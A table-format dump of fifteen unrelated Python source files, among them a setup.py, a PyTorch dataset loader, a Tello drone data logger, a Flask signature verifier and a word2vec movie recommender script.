index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
8,100 | 58438a1fb0b9e620717ba262c25a43bfbf6b8824 | __author__ = 'tcaruso'
# !/usr/bin/env python
# -*- coding: utf-8 -*-
import glob
import fnmatch
import os
import sys
import warnings
from shutil import rmtree
from setuptools import find_packages, setup, Command
from collections import namedtuple
try:
from pip._internal.req import parse_requirements
except ImportError:
from pip.req import parse_requirements
except Exception:
from pip import __version__ as __pip_version__
msg = """Sorry, could not install due to a pip import error. Please open an issue on the repo
with this message and the error so it can be addressed.
pip version: {}
python version: {}
""".format(__pip_version__, '.'.join(sys.version_info))
raise EnvironmentError(msg)
here = os.path.abspath(os.path.dirname(__file__))
# ------------------------------------------------
# Package meta-data.
# PACKAGE_NAME is the name of the package directory and the import path. If you use my_package then when installed, you
# will import the package like `import my_package`.
PACKAGE_NAME = 'socket_wait'
DESCRIPTION = 'Listen on a port until a connection is received.'
URL = 'https://github.com/tomplex/socket_wait'
EMAIL = 'carusot42@gmail.com'
AUTHOR = 'Tom Caruso'
# The minimum Python version required
REQUIRES_PYTHON = (2, 7, 0)
# PYPI_NAME is the name of the package on pypi. We'll default to pbvt_{PACKAGE_NAME} so we avoid name collisions
# with PyPI. You'll use this name to install the package.
PYPI_NAME = '{}'.format(PACKAGE_NAME)
# Specify the name of the requirements file we should use. If there is none, then just leave it as is. We'll detect
# ------------------------------------------------
# Check Python version we're installing against. Bail if it's not correct. This will blow up both when we build the
# package and when someone tries to install it.
if sys.version_info < REQUIRES_PYTHON:
# Raise if we're trying to install on an unsupported Python version
raise Exception("Package {} requires python >= {}.".format(PYPI_NAME, '.'.join(map(str, REQUIRES_PYTHON))))
REQUIRES_PYTHON = '>=' + '.'.join(map(str, REQUIRES_PYTHON))
# ------------------------------------------------
# Requirements gathering.
about = {}
from socket_wait import __version__
about['__version__'] = __version__
class UploadCommand(Command):
"""Support setup.py upload."""
description = 'Build and publish the package.'
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
@staticmethod
def status(s):
"""Prints things in bold."""
print('\033[1m{0}\033[0m'.format(s))
def run(self):
try:
self.status('Removing previous builds…')
rmtree(os.path.join(here, 'dist'))
except OSError:
pass
self.status("Installing required build packages...")
os.system('{0} -m pip install wheel twine'.format(sys.executable))
self.status('Building Source and Wheel (universal) distribution…')
os.system('{0} setup.py sdist bdist_wheel --universal'.format(sys.executable))
self.status('Uploading the package to pypi via Twine…')
os.system('{0} -m twine upload dist/* '.format(sys.executable))
sys.exit()
setup(
name=PYPI_NAME,
version=about['__version__'],
description=DESCRIPTION,
author=AUTHOR,
author_email=EMAIL,
url=URL,
py_modules=['socket_wait'],
include_package_data=True,
# If your package has a CLI component, specify it in entry_points.
# for example, if you want it to be called like "mycli" from the command line, and the command line entry
# point lives in the somepackage/cli.py file, in the function main, you'd construct it like this:
entry_points={
'console_scripts': ['socket_wait=socket_wait:cli'],
},
classifiers=[
# Trove classifiers
# Full list: https://pypi.python.org/pypi?%3Aaction=list_classifiers
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: Implementation :: CPython',
],
# setup.py publish support.
cmdclass={
'upload': UploadCommand,
},
)
|
8,101 | 8a0a98ab072e46463d80d8638c830e6db0032a77 | import cv2
import random
import os
import numpy as np
import matplotlib.pyplot as plt
import torch
from torch.utils.data import Dataset
from torchvision import transforms
class ShanghaiTechPartA(Dataset):
def __init__(self, root, shuffle=False, transform=None, downsample=1):
self.root = root
self.shuffle = shuffle
self.transform = transform
self.downsample = downsample
self.image_names = [filename for filename in os.listdir(self.root)]
self.n_samples = len(self.image_names)
if self.shuffle:
random.shuffle(self.image_names)
def __len__(self):
return self.n_samples
def __getitem__(self, index):
assert index <= len(self), 'index range error'
img_name = self.image_names[index]
# Read image and normalize its pixels to [0,1]
img = plt.imread(os.path.join(self.root,img_name)) / 255
# Expand grayscale image to three channel.
if len(img.shape) == 2:
img = img[:,:,np.newaxis]
img = np.concatenate((img,img,img),2)
# Read ground truth density-map
density_map = np.load(os.path.join(self.root.replace('images','density_maps'),img_name.replace('.jpg','.npy')))
# Downsample image and density-map to match model's input
if self.downsample >1:
rows = int(img.shape[0] // self.downsample)
cols = int(img.shape[1] // self.downsample)
img = cv2.resize(img,(cols*self.downsample, rows*self.downsample))
img = img.transpose((2,0,1)) # convert to order (channel,rows,cols)
density_map = cv2.resize(density_map, (cols,rows))
density_map = density_map[np.newaxis,:,:] * self.downsample * self.downsample
# transform image and density_map to tensors
img_tensor = torch.tensor(img, dtype=torch.float)
density_map_tensor = torch.tensor(density_map, dtype=torch.float)
# Apply any other transformation
if self.transform is not None:
img_tensor = self.transform(img_tensor)
return img_tensor, density_map_tensor
# Test code
if __name__== "__main__":
root = '/Users/pantelis/Downloads/archive/ShanghaiTech/part_A/train_data/images'
dataset = ShanghaiTechPartA(root,
transform=transforms.Normalize(
mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]),
downsample=8)
index = random.randint(0, len(dataset))
img, dmap = dataset[index]
print(index, img.shape, dmap.shape)
|
8,102 | a3662b4b9569046e67c39c1002234c1fbd85c650 | # Name: BoardingPass.py
# Description: Class to create and output a boarding pass
# Ver. Writer Date Notes
# 1.0 Shuvam Chatterjee 05/22/20 Original
from random import randint
class BoardingPass:
def __init__(self, reservation):
self.reservation = reservation
self.export()
def export(self):
fileName = "reservations/data_reservation/boarding_passes"
file = open(fileName, "a")
flights = self.reservation.getFlights()
string = ""
for i in range(len(flights)):
flight = flights[i]
gate = randint(1, 8)
for passenger in self.reservation.getPassengers():
string += "BOARDING PASS"
string += "NAME OF PASSENGER:\n"
string += passenger.getLastName() + " / " + passenger.getFirstName() + "\n"
string += "FROM: " + flight.getOrigin() + "\n"
string += "TO: " + flight.getDestination() + "\n"
string += "SEAT: " + passenger.getSeats()[i]
string += "GATE: " + str(gate) + "\n"
string += "\n\n"
print(string, file=file)
file.close()
return fileName |
8,103 | bc9718fa57046888961d1b5245abefa8f752e983 | import hashlib
import os
def fileMD(self):
salt_ = os.urandom(32).hex()
hash_object = hashlib.md5()
hash_object.update(('%s%s' % (salt_, self.theFile)).encode('utf-8'))
print("MD5 Hash: "+hash_object.hexdigest()) |
8,104 | 43ecb173e3d306284f2122410b5b74945572f683 | #!/usr/bin/env python
#coding:utf-8
'''
Created on 2016年8月29日
@author: lichen
'''
def custom_proc(request):
"""
自定义context_processors
"""
return {
"context_test":"test"
} |
8,105 | 9ae7b6d081529a5c70b7362c852647b3638e7e98 | print ("Hello"*5)
|
8,106 | 71c6d5e385e3db8444d7ef8b0231e72db8538eb7 | """
TODO: update description after everything (requirements) is (are) stable/concrete
Description: Script to extract KeepingTrac's creative names and send
team notification to start manual mapping as necessary.
This step must happen BEFORE the processing of deduping of RenTrak
creative names (step 2 in RenTrak processing).
"""
import pandas as pd
from mailer import Mailer
from vertica_utils import *
from s3_utils import *
def notify_for_manual_mapping(file, process_name):
email_str = """
<p>Python script extracted new creative names from KeepingTrac data.</p>
<p>To run the rest of the RenTrak ETL process smoothly, please do the followings:
<ol>
<li>download the attached file, <b>{0}</b>, from this email</li>
<li>fill up empty (nan/NULL) kt_creative mappings under column C (kt_creative_clean) in that file</b></li>
<li>upload the modified file to the S3 location below
<span style="color: red;">(replace any file with the same name in the S3 folder, if any)</span>:<br>
<b>diap.prod.us-east-1.target/RenTrak/CreativeCleaned</b>
</li>
<li>run this feed in DataVault: <b>InCampaign KT Creative Mappings</b></li>
<li><span style="color: red;">AFTER the DataVault feed successfully loaded the mappings</span>,
run this SQL in Vertica backend: <br>
<b>
UPDATE gaintheory_us_targetusa_14.incampaign_process_switches
SET run = 1
WHERE process_name = '{1}';
</b>
</li>
</ol>
</p>
<p><strong style="color: red;">NOTE: If you forget a step or more above, the second part of RenTrak processing
may not produce correct results.</strong></p>
""".format(file, process_name)
return email_str
def notify_no_new_mapping_found():
email_str = """
<p>Python script does not find any new creative names from keepingtrac data.
Stage 2 of processing RenTrak data will begin when we load new data to RenTrak tables.
</p>
<p><b>No further action on your part is needed.</b></p>
"""
return email_str
def send_notification_email(recipients, subject, body, attachment=None):
Mailer().send_email(recipients, subject, body, attachment)
print("Notification email sent.")
# Function to extract data from vertica into a pandas dataframe
def vertica_extract(query, columns, index=None):
with vertica_python.connect(**conn_info) as connection:
cur = connection.cursor()
cur.execute(query)
results = pd.DataFrame(cur.fetchall())
results.columns = columns
if index:
return results.set_index(index)
else:
return results
def set_flag_value(table_name, schema_name, flag_name, value):
return """
UPDATE {1}.{0}
SET run = {3}
WHERE process_name = '{2}';
COMMIT;
""".format(table_name, schema_name, flag_name, value)
def set_lock(table_name, schema_name, flag_name, value):
with vertica_python.connect(**conn_info) as connection:
cur = connection.cursor()
cur.execute(set_flag_value(table_name, schema_name, flag_name, value))
connection.commit()
def main():
# start_date = (today - datetime.timedelta(weeks=6, days=1)).strftime('%Y-%m-%d')
schema_name = 'gaintheory_us_targetusa_14'
mapping_table = 'incampaign_kt_creative_mappings'
flag_table = 'incampaign_process_switches'
flag = 'rentrak_kt_creative_cleaned'
# Location of sources and destination files
output_folder = ROOT_FOLDER + 'RenTrak'
output_file = 'kt_creative_cleaned.xlsx'
if not os.path.exists(output_folder):
print("Creating a new local folder for export file:", output_folder)
os.makedirs(output_folder)
# Step 1: Download all possible KT combinations and current matching cleaned creative names
extract_query = """
SELECT Air_ISCI as kt_creative_id, Cmml_Title AS kt_creative, kt_creative_clean
FROM {1}.incampaign_keepingtrac_all a
LEFT JOIN {1}.{0} b
ON a.Air_ISCI = b.kt_creative_id
WHERE Air_ISCI IS NOT NULL
GROUP BY a.Air_ISCI, a.Cmml_Title, kt_creative_clean
ORDER BY kt_creative_id
""".format(mapping_table, schema_name)
df = vertica_extract(
extract_query,
['kt_creative_id', 'kt_creative', 'kt_creative_clean']
)
unmapped_creatives = df.isnull().sum()['kt_creative_clean'] # remove blank cells
if unmapped_creatives > 0:
print("Some unmapped kt_creatives found")
print("Acquiring process lock:", flag, "so that the second part of RenTrak processing cannot proceed")
set_lock(flag_table, schema_name, flag, 0)
file_to_export = os.path.join(output_folder, output_file)
df[df['kt_creative_clean'].isnull()].to_excel(file_to_export, index=False)
# Send email to tell the team to start manual mapping
subject = "RenTrak automated processing step 1: new kt_creatives need to be mapped"
body = notify_for_manual_mapping(output_file, flag)
send_notification_email(ONSHORE_EMAIL_RECIPIENTS, subject, body, file_to_export)
print("Notified the team to add manual mapping")
os.remove(file_to_export)
print("Deleted local file=>", file_to_export)
else:
print("Everything is mapped")
print("Releasing process lock:", flag, "so that the second part of RenTrak processing can proceed")
set_lock(flag_table, schema_name, flag, 1)
# insert, set flag to 1 and send email notification about being cleaned
subject = "RenTrak automated processing step 1: kt_creatives are all mapped. Step 2 will automatically commence."
body = notify_no_new_mapping_found()
send_notification_email(ONSHORE_EMAIL_RECIPIENTS, subject, body)
print("Notified the team that no further action on their part is required")
if __name__ == "__main__":
main()
|
8,107 | 6c0080aa62579b4cbdaf3a55102924bfe31ffb40 | #давайте напишем программу русской рулетки
import random
amount_of_bullets = int(input("Сколько вы хотите вставить патронов?"))
baraban = [0, 0, 0, 0, 0, 0]
# 0 -аналогия пустого гнезда
# 1 - аналогия гнезда с патроном
for i in range(amount_of_bullets):
print(i)
baraban[i] = 1
print("Посмотрите на барабан", baraban)
how_much = int(input("сколько раз вы собираетесь нажать на курок? "))
for i in range(how_much):
random.shuffle(baraban)
if baraban[0] == 1:
print("Бабах")
exit()
else:
print('щелк')
|
8,108 | 9e751bbddabbec7c5e997578d99ef1b8c35efe06 | from djitellopy import Tello
import time
import threading
import pandas as pd
class DataTello:
def __init__(self):
# Inicia objeto de controle do Tello
self.tello = Tello()
# Array onde será armazenado a lista de dados coletado pelo Tello
self.__data = []
self.__array = []
# Tempo de voo em mili segundos
self.tempoVoo = 420000
'''
___Padrão para nome dos arquivos das tabelas___
Onde x é o nº da tabela e y a quantidade de tempo em segundos do voo
1. Para a janela fechada e porta fechada: x_tudoFechado_y.csv
2. Para a janela aberta e porta aberta: x_janelaPortaAberta_y.csv
3. Para a janela e porta aberta, com ventilador ligado na direção do drone: x_janelaPortaAbertaVentilador_y.csv
'''
# Padrão de nome
self.nomeArquivo = '2_tudoFechado_420'
self.__df = pd.DataFrame(columns=['timestamp', 'pitch', 'roll',
'yaw', 'vgx', 'vgy', 'vgz',
'templ', 'temph', 'tof',
'height', 'battery', 'barometer',
'time', 'agx', 'agy', 'agz'])
'''
self.__startCollector = False
self.__endProgram = False
threadCollector = threading.Thread(target=self.dataCollector, args=())
threadCollector.daemon = False
threadCollector.start()
def dataCollector(self):
while True:
if self.__startCollector:
self.__data.append(self.tello.get_states())
if self.__endProgram:
for item in self.__data:
timestamp = int(round(time.time() * 1000)) # Cria timestamp no momento que recebe os dados
self.__df.loc[len(self.__df)] = [timestamp, item[1], item[3], item[5], item[7],
item[9], item[11], item[13], item[15], item[17], item[19],
item[21], item[23], item[25], item[27], item[29], item[31]] # Adiciona os novos valores em uma nova linha do DataFrame
self.__df.to_csv('{}.csv'.format(self.nomeArquivo))
break
'''
def fly(self):
#
self.tello.connect()
self.tello.takeoff()
timestampInicial = int(round(time.time() * 1000))
timestampFinal = timestampInicial
while ((timestampFinal - timestampInicial) < self.tempoVoo):
try:
timestampFinal = int(round(time.time() * 1000)) # Cria timestamp no momento que recebe os dados
self.__data.append(self.tello.get_states())
if (not len(self.__data) % 20 == 0):
self.tello.send_command_without_return('command')
except KeyboardInterrupt:
print ('\n . . .\n')
self.tello.end()
break
self.tello.land()
self.tello.end()
for item in self.__data:
timestamp = int(round(time.time() * 1000)) # Cria timestamp no momento que recebe os dados
self.__df.loc[len(self.__df)] = [timestamp, item[1], item[3], item[5], item[7],
item[9], item[11], item[13], item[15], item[17], item[19],
item[21], item[23], item[25], item[27], item[29], item[31]] # Adiciona os novos valores em uma nova linha do DataFrame
self.__df.to_csv('{}.csv'.format(self.nomeArquivo))
def stop(self):
self.tello.end()
def run(self):
self.tello.connect()
self.tello.takeoff()
tempo1 = self.tello.get_flight_time()
tempo1 = tempo1[0:(len(tempo1)-1)]
#time.sleep(3)
bateria = self.tello.get_battery()
tempo2 = self.tello.get_flight_time()
tempo2 = tempo2[0:(len(tempo2)-1)]
print('Nivel da bateria é: {}'.format(str(bateria)))
print('Tempo de início foi {}'.format(str(tempo1)))
print('Tempo de término foi de {}'.format(str(tempo2)))
while ((int(tempo2) - int(tempo1)) < 10):
print('Nivel da bateria é: ' + str(bateria))
self.__array.append(self.tello.get_attitude())
self.__data.append(self.tello.get_states())
tempo2 = self.tello.get_flight_time()
tempo2 = tempo2[0:(len(tempo2)-1)]
self.tello.land()
self.tello.end()
print(self.__array)
print(self.__data)
def main():
dataTello = DataTello()
dataTello.fly()
#dataTello.stop()
if __name__ == "__main__":
main() |
8,109 | c8d5b8515a468190d14311118e12a7d414908be6 | class UF(object):
def __init__(self, n):
self.parents = [i for i in range(n)]
self.weights = [1 for i in range(n)]
self.n = n
def find(self, i):
while i != self.parents[i]:
self.parents[i] = self.parents[self.parents[i]]
i = self.parents[i]
return i
def union(self, p, q):
i = self.find(p)
j = self.find(q)
if i == j:
return
if self.weights[i] < self.weights[j]:
self.parents[i] = j
self.weights[j] += self.weights[i]
else:
self.parents[j] = i
self.weights[i] += self.weights[j]
self.n -= 1
def is_connected(self, p, q):
i = self.find(p)
j = self.find(q)
return i== j
def __len__(self):
return self.n
if __name__ == '__main__':
uf = UF(10)
uf.union(1, 2)
uf.union(3, 4)
uf.union(2, 4)
assert len(uf) == 7
assert uf.is_connected(1, 4)
assert not uf.is_connected(1, 5)
|
8,110 | acb9b6128a3432aecf3498e1d27bdff204fee0f4 | import unittest
import calla.test
TestCase = calla.test.TestCase
from math import pi
from calla.TB.RC_strength import *
class test(TestCase):
def test1(self):
"""
标准验证:铁路混凝土结构设计原理(容许应力计算法).ppt 例1
"""
b = 200
h0 = 411
As = 763
n = 15
M = 31.5
r = beam_strength.cal_σ1(b,h0,As,n,M)
print('σc,σs,x = ',r)
# 控制误差范围1%
assert abs(r[0]-5.26)/5.26<0.01
assert abs(r[1]-115.3)/115.3<0.01
assert abs(r[2]-167.1)/167.1<0.01
def test2(self):
"""
标准验证:混凝土结构基本原理答案吕晓寅版第12章
"""
b = 250
h = 350
l0 = 5
a = 40
a_ = 40
Ec = 3.0E4 #MPa
As = 1017
As_ = 1017
n = 10
M = 20 #kN
N = 450
r = column_strength.solve_stress(b,h,l0,a,a_,Ec,As,As_,n,M,N,0)
print('σc,σs,σs\'\n',r)
assert abs(r[0]-7.56)/7.56<0.01
assert abs(r[2]-67.8)/67.8<0.01
def test3(self): #随意修改测试
b = 600
h0 = 937.5
As = 3434.375
n = 10
M = 700
V = 300
r = beam_strength.cal_σ1(b,h0,As,n,M)
s = beam_strength.shear_stress(b,h0,As,n,V)
print('σc,σs,x = \n',r)
print('τ = ',s)
M1 = 10
M2 = 10
σs = r[1]
Es = 2.0E5
d = 28
a = 62.5
n1 = As/(pi/4*d**2)
wf = crack_width.solve_wf(M1,M2,M,σs,Es,d,a,b,n1)
print('wf = ',wf)
def test_column_strength(self): #随意修改测试
b = 1200
h = 1200
l0 = 5
a = 90
a_ = 90
Ec = 3.45E4 #MPa
As = 12316
As_ = 12316
n = 10
M = 2800 #kN
N = 14000
r = column_strength.solve_stress(b,h,l0,a,a_,Ec,As,As_,n,M,N,0)
print('σc,σs,σs\'\n',r)
if __name__ == '__main__':
unittest.main()
|
8,111 | 9d142e8de5235d55cd99371c9884e8dc7a10c947 | import os
from flask import (
Flask,
render_template,
request
)
# from flask_jwt_extended import JWTManager
from flask_login import LoginManager
from flask_migrate import Migrate
from flask_sqlalchemy import SQLAlchemy
from flask_wtf.csrf import CSRFError, CSRFProtect
from config import Config
from log_config.custom_logger import logger
app = Flask(__name__)
app.config.from_object(os.environ.get('APP_SETTINGS', Config))
csrf = CSRFProtect(app)
login = LoginManager(app)
db = SQLAlchemy(app)
migrate = Migrate(app, db)
# jwt = JWTManager(app)
@app.errorhandler(404)
def not_found(error):
logger.warning(f'page not found {error} - {request.url}')
return render_template('error_pages/404.html'), 404
@app.errorhandler(500)
def server_error(error):
logger.error(f'server error {error} - {request.url}')
return render_template('error_pages/500.html'), 500
# from app.api.auth.controller import api_auth
from app.mod_auth.controller import mod_auth as auth_module
from app.mod_home.controller import mod_home as home_module
# app.register_blueprint(api_auth)
app.register_blueprint(auth_module)
app.register_blueprint(home_module)
# csrf.exempt(api_auth)
|
8,112 | be9c21ee04a612f711a1e6a82ea9478c77b62a82 | import ZooAnnouncerInterface
class ZooAnnouncer(ZooAnnouncerInterface):
def updateZoo(self,annoucement):
print("ZooAnnouncer :" + annoucement) |
8,113 | 8bae45de54535e7b0788aa12717645ae9f193664 | from flask import Flask, request, jsonify
from flask_restful import Api
import json
import eth_account
import algosdk
app = Flask(__name__)
api = Api(app)
app.url_map.strict_slashes = False
@app.route('/verify', methods=['GET','POST'])
def verify():
content = request.get_json(silent=True, force=True)
#Check if signature is valid
print(content)
if content == None:
return jsonify("No json data is sent.")
sig = content.get('sig')
payload = content.get('payload')
message = payload.get('message')
pk = payload.get('pk')
platform = payload.get('platform')
if platform == "Ethereum":
encoded_msg = eth_account.messages.encode_defunct(text=json.dumps(payload))
result = eth_account.Account.recover_message(encoded_msg,signature=sig) == pk
else:
result = algosdk.util.verify_bytes(json.dumps(payload).encode('utf-8'), sig, pk)
return jsonify(result)
if __name__ == '__main__':
app.run(port='5002')
|
8,114 | 04dc4d46a645a23913e33606c500037d37418cd7 | import numpy as np
import pandas as pd
from scipy import sparse, io
import cPickle as pickle
import sys
sys.path.append('code')
import models
import split
from itertools import chain
def test_simple_instance(items, item_numbers, negative_items, user):
model = models.Word2VecRecommender(size=200, window=max(item_numbers), min_count=1)
model.fit(items)
user_items = items[user-1]
#negative_items = [str(-1 * int(x)) for x in unliked_list[user-1]]
negative_items = [str(-1 * int(x)) for x in negative_items[user-1]]
#negative_items=[]
recommendations = model.recommend(user_items, negative_items, num_items=50)
return recommendations
def test_simple_instance_test1(test_user, items, item_numbers, negative_items, user):
'''
Returns list of tuples representing item recommendations.
- based on user's liked_list and disliked_list
- contains cosine similarities of the recommendations
'''
model = models.Word2VecRecommender(size=200, window=max(item_numbers), min_count=1)
model.fit(items)
user_items = items[user-1]
negative_items = [str(-1 * int(x)) for x in negative_items[user-1]]
final = model.recommend2(test_user, user_items, negative_items, num_items=100)
return final # movieId
def extract_names(recommendations, movies_contents):
'''
Returns and print the name of the itmes.
It contains the name and the genre.
'''
recommended_list = list(zip(*recommendations)[0]) # movieId
# adjusting index by subtracting 1
recommended_list = [int(x) for x in recommended_list]
extracted = movies_contents.ix[recommended_list,:]
print extracted
print '\n'
return extracted
def examine_the_results2(final_extracted, rtmp, user):
'''
Returns the actual ratings of the recommend items from the user.
Used for evaluating the performance of the recommender.
'''
idx = final_extracted.index
examine_list = []
rt = list(chain.from_iterable(rtmp[user-1].toarray().tolist()))
for i in idx:
r = rt[i-1]
examine_list.append(r)
print examine_list
return examine_list
def examine_the_results3(final_extracted, test_user, user):
'''
Returns the actual ratings of the recommend items from the user.
Used for evaluating the performance of the recommender.
'''
idx = final_extracted.index
examine_list = []
for i in idx:
r = int( test_user[test_user['movieId'] == i].rating )
examine_list.append(r)
print examine_list
return examine_list
def rec_eval(items, item_numbers, disliked_list, movies_contents, rtmp, user):
'''
User-specific processes.
'''
recommendations = test_simple_instance_test1(test_user, items, item_numbers, disliked_list, user)
print recommendations
# what are the names of the recommended movies
print "Recommended movies"
extracted = extract_names(recommendations, movies_contents)
print "User {}'s ratings on Recommended movis".format(user)
examine_list = examine_the_results2(extracted, rtmp, user)
return examine_list
def testing(train_user, test_user, items, item_numbers, disliked_list, rtmp, user):
# old
negative_items = disliked_list
recommendations = test_simple_instance(items, item_numbers, negative_items, user)
print "Recommended movies"
extracted = extract_names(recommendations, movies_contents)
print "User {}'s ratings on Recommended movis".format(user)
examine_list = examine_the_results2(extracted, rtmp, user)
# new
final = test_simple_instance_test1(test_user, items, item_numbers, disliked_list, user)
print final
print "final"
#recommended_list = list(zip(*recommendations)[0])
#recommended_list = [int(x)-1 for x in recommended_list]
# final_extracted = movies_contents.ix[final,:]
# print "User {}'s ratings on Recommended movis".format(user)
# examine_list = examine_the_results2(final_extracted, rtmp, user)
print 'train_user.shape',train_user.shape
print 'test_user.shape',test_user.shape
print 'train_user.movieId.unique()',train_user.movieId.unique().size
print 'test_user.movieId.unique()',test_user.movieId.unique().size
# final=[]
# for movie in recommended_list:
# if movie in train_user.movieId.unique():
# print "movie ",movie,' is in train_user'
# if movie in test_user.movieId.unique():
# final.append(movie)
# print "movie ",movie,' is in test_user'
print "Final movies"
final_extracted = movies_contents.ix[final,:]
print "User {}'s ratings on Final movies".format(user)
final_examine_list = examine_the_results3(final_extracted, test_user, user)
print final_examine_list
# user 654(userId 654) All recommendations
# [('186', 0.999988317489624),
# ('208', 0.9999874234199524),
# ('527', 0.9999861121177673),
# ('153', 0.9999856948852539),
# ('125', 0.9999853372573853),
# ('588', 0.9999845027923584),
# ('204', 0.9999845027923584),
# ('485', 0.9999840259552002),
# ('216', 0.9999839067459106),
# ('172', 0.9999837875366211),
# ('419', 0.9999837875366211),
# ('132', 0.9999836683273315),
# ('451', 0.9999836683273315),
# ('202', 0.9999836087226868),
# ('11', 0.9999832510948181),
# ('182', 0.9999831914901733),
# ('71', 0.9999830722808838),
# ('234', 0.9999829530715942),
# ('83', 0.9999829530715942),
# ('237', 0.9999825954437256),
# ('228', 0.999982476234436),
# ('82', 0.9999821782112122),
# ('223', 0.9999821186065674),
# ('385', 0.9999821186065674),
# ('96', 0.9999818801879883),
# ('501', 0.9999818801879883),
# ('95', 0.999981701374054),
# ('1', 0.9999816417694092),
# ('196', 0.9999814629554749),
# ('684', 0.9999814033508301),
# ('288', 0.9999814033508301),
# ('200', 0.9999813437461853),
# ('199', 0.9999813437461853),
# ('28', 0.9999812841415405),
# ('144', 0.9999812841415405),
# ('121', 0.999981164932251),
# ('423', 0.9999811053276062),
# ('484', 0.9999809265136719),
# ('655', 0.9999808073043823),
# ('663', 0.9999805688858032),
# ('174', 0.9999805688858032),
# ('568', 0.9999803304672241),
# ('432', 0.9999803304672241),
# ('69', 0.9999802112579346),
# ('257', 0.9999802112579346),
# ('183', 0.9999801516532898),
# ('179', 0.9999799728393555),
# ('735', 0.9999799728393555),
# ('168', 0.9999799728393555),
# ('181', 0.9999799728393555)]
# user 654(userId 654) Final recommendations
#[588, 71, 196, 144, 98, 83, 82, 69, 204, 568, 215, 174, 317, 66, 269, 735]
# User 654's ratings on Final movies
# [4, 3, 5, 5, 5, 5, 5, 4, 4, 4, 4, 5, 4, 4, 4, 4]
# later...
# def iter_exam(items, item_numbers, disliked_list, movies_contents, rtmp, user):
# num_iter = 10
# examine_list_iter = []
# for i in xrange(num_iter):
# print 'iteration number: ', i+1
# element = rec_eval(items, item_numbers, disliked_list, movies_contents, rtmp, user)
# examine_list_iter.append(element)
# print examine_list_iter
# return examine_list_iter
def count_num_ratings_per_users(ratings_as_mat):
'''
To identify the number of ratings per users
'''
count_per_users = {}
tmp = sparse.csr_matrix(ratings_as_mat)
num_users = tmp.shape[0]
for i in xrange(num_users):
ratings_list = [int(x) for x in list(chain.from_iterable(tmp[i].toarray().tolist())) if x > 0]
count_per_users[i+1] = len(ratings_list)
if i % 100 == 0:
print '<counting number of ratings for user>', i , ' out of ', num_users
return count_per_users
def recall_at_M(test_user, final_examine_list, num_items):
'''
Number of items user i liked among the top M items (test set)
recall @ M = --------------------------------------------------------------
Total number of items user i likes (test set)
'''
# first define "likes"
# likes = ratings over 4
numerator = len([x for x in final_examine_list if x >=4])
denominator = len(final_examine_list) # M
return float(numerator) / denominator
if __name__=="__main__":
up=5; down=2
user = 181
# how many movies do users rated?
# count_ratings_per_users = count_num_ratings_per_users(ratings_as_mat)
# count_ratings_per_users = pd.DataFrame(count_ratings_per_users.items(), columns = ['userId','num_ratings'])
# count_ratings_per_users = count_ratings_per_users.sort_values(by = 'num_ratings', axis =0, ascending = False)
# In [145]: count_ratings_per_users
# Out[145]:
# userId num_ratings
# 12 13 526
# 404 405 520
# 654 655 443
# 449 450 423
# 275 276 400
# 302 303 385
# 233 234 369
# 536 537 349
# 6 7 328
# 845 846 321
# 392 393 318
# 307 308 314
# 278 279 308
# 180 181 308
# 93 94 306
# 91 92 296
# 428 429 295
# 416 417 292
# 879 880 288
# 757 758 287
# 221 222 286
# 434 435 285
# 292 293 280
# 200 201 279
# 377 378 276
# 560 561 275
# 129 130 273
# 681 682 273
# 591 592 271
# 58 59 270
'''
User 13's ratings on Final movies
[5, 4, 4, 4, 4, 5, 2, 4, 2, 3, 3, 4, 4, 5]
User 405's ratings on Final movies
[3, 5, 4, 5, 3, 4, 3, 4, 5, 3, 4, 5, 5, 3, 5, 5, 5, 3]
User 450's ratings on Final movies
[4, 5, 3, 5, 3, 4, 5, 5, 3, 3, 5, 3, 5, 4, 3, 5, 4, 4, 5, 3, 4, 4]
User 276's ratings on Final movies
[5, 4, 5, 5, 4, 4, 4, 5, 4, 4, 4, 5]
User 276's ratings on Final movies
[5, 4, 4, 4, 5, 4, 4, 4, 4, 4, 4, 5, 4]
User 303's ratings on Final movies
[4]
User 303's ratings on Final movies
[4]
User 234's ratings on Final movies
[3, 3, 4]
User 234's ratings on Final movies
[3, 4, 2, 3]
User 537's ratings on Final movies
[3, 3, 1, 3, 3, 3, 3, 2, 2]
User 537's ratings on Final movies
[2, 1, 3, 3, 2, 3]
User 7's ratings on Final movies
[5, 4, 5, 5, 1, 3, 5, 5, 5, 5, 5, 5, 4]
User 7's ratings on Final movies
[5, 5, 5, 5, 3, 5, 1, 5, 4, 5, 4, 5, 4, 5]
User 846's ratings on Final movies
[]
User 393's ratings on Final movies
[3, 3, 3, 4]
User 308's ratings on Final movies
[4, 3, 4, 3, 3, 4, 4]
User 279's ratings on Final movies
[3, 3, 3, 1, 4, 5, 4, 3, 3, 4, 1, 5, 4, 3]
User 181's ratings on Final movies
[1, 1, 1, 2, 1, 1, 1, 1, 1, 2, 2, 1, 1, 2]
User 94's ratings on Final movies
[5, 5, 4, 5, 4, 3, 5]
User 92's ratings on Final movies
[4, 3, 3, 4]
User 429's ratings on Final movies
[5, 4, 5, 5, 5, 5, 4, 4]
User 417's ratings on Final movies
[4, 3]
'''
# preprocessing the data
# ratings_as_mat = pickle.load(open('data/ratings_as_mat_train.pkl', 'rb'))
# movies_as_mat = pickle.load(open('data/movies_as_mat_train_.pkl', 'rb'))
# movies_contents = pd.read_csv("data/movies.csv")
# movies_contents = movies_contents.set_index('movieId')
train_df = pickle.load(open('data/train_df.pkl', 'rb'))
test_df = pickle.load(open('data/test_df.pkl', 'rb'))
train_user = train_df[train_df['userId'] == user] # user already rated. used for training
test_user = test_df[test_df['userId'] == user] # user already rated. used for validation
# items, item_numbers, disliked_list from train_df
items = pickle.load(open('data/items_train_{}.pkl'.format((up,down)), 'rb'))
item_numbers = pickle.load(open('data/item_numbers_train_{}.pkl'.format((up,down)), 'rb'))
disliked_list = pickle.load(open('data/disliked_list_train_{}.pkl'.format((up,down)), 'rb'))
rtmp = sparse.csr_matrix(ratings_as_mat)
# examine_list = rec_eval(items, item_numbers, disliked_list, movies_contents, rtmp, user)
#testing(train_df, test_df, items, item_numbers, disliked_list, rtmp, user)
# copy and paste... of the function testing
negative_items = disliked_list
recommendations = test_simple_instance(items, item_numbers, negative_items, user)
print "Recommended movies"
extracted = extract_names(recommendations, movies_contents)
print "User {}'s ratings on Recommended movis".format(user)
examine_list = examine_the_results2(extracted, rtmp, user)
